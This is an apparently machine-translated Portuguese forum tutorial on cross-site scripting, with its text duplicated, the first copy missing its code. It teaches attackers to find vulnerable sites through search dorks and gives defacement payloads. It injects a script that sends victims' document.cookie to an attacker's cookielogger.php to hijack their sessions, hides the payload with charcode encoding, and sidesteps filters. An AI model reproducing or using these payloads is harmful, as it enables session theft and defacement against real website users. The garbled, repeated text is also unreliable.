O que é Cross Site Scripting (XSS)?
Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na WWW.
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS ...
1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.
2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos "input", como shoutboxes, blogs e guestbooks.
Encontrando vulnerabilidades XSS
1. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Visite
2. Use "dorks Google", como search.php? Q =
3. Encontrado o "direito" site para injetá-lo.
Noções básicas de XSS
Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:
Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer "alguma coisa".
Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:
Isso foi um exemplo para um XSS com javascript.
Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS.
Aqui está um exemplo de uma injeção HTML:
Será algo como:
Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS.
Defacment com XSS
Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos:
= Irá incluir uma imagem
= Incluirá um vídeo em Flash
= Vai incluir um arquivo de música em modo oculto
= Redireccionado para outro site, neste caso "XXXXXXXXXXXX.net"
Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)
Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!
Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)
Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger.
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.
Mas o que é se o site não possui uma função tal loja?
Veja ...
Você será redirecionado ao site original para o servidor.
(você deve cripta "a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL)
Mas como "crypt" esse código para se tornar "normal", de modo que sua vítima não percebe o redirecionamento para o servidor?
Fácil ... tudo que você precisa é de uma String para ASCII Converter e as características da função ()
(Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.
é igual
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta:
Finished! Você crypted seu código malicioso a um "código" malicioso escondido: D!
Ignorando Filtros
Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?
Hm, temos de encontrar outro método ... basta escrever o código de uma maneira diferente.
seria
E ISSO GALERA ATE A PROXIAMA.
Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na WWW.
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS ...
1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.
2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos "input", como shoutboxes, blogs e guestbooks.
Encontrando vulnerabilidades XSS
1. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Visite
2. Use "dorks Google", como search.php? Q =
3. Encontrado o "direito" site para injetá-lo.
Noções básicas de XSS
Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:
<script>alert("something")</script>
Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:
http://database.delete.com/search.php?q=<script>alert("something")</script>
Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS.
Aqui está um exemplo de uma injeção HTML:
<br><br><b><u>something</u></b>
http://database.delete.com/search.php?q=<br><br><b><u>something</u></b>
Defacment com XSS
Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos:
<IMG SRC="http://mywebsite.com/defacmentpic.jpg">
<EMBED SRC="http://mywebsite.com/deface.swf"
<embed src="deface.mid" hidden autostart="true" loop="false" />
= Vai incluir um arquivo de música em modo oculto
<script>window.open( "http://www.XXXXXXX.net/" )</script>
Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)
Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!
Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.
Mas o que é se o site não possui uma função tal loja?
Veja ...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... = "http://myserver.com/cookielogger.php?c="+document.cookie
Você será redirecionado ao site original para o servidor.
(você deve cripta "a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL)
Mas como "crypt" esse código para se tornar "normal", de modo que sua vítima não percebe o redirecionamento para o servidor?
Fácil ... tudo que você precisa é de uma String para ASCII Converter e as características da função ()
(Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.
<script>alert("Example")</script>
é igual
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta:
60,115,99,114,105, [...]
Finished! Você crypted seu código malicioso a um "código" malicioso escondido: D!
Ignorando Filtros
Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?
Hm, temos de encontrar outro método ... basta escrever o código de uma maneira diferente.
<script>alert("Example")</script>
seria
')alert("Example");
E ISSO GALERA ATE A PROXIAMA.
Comment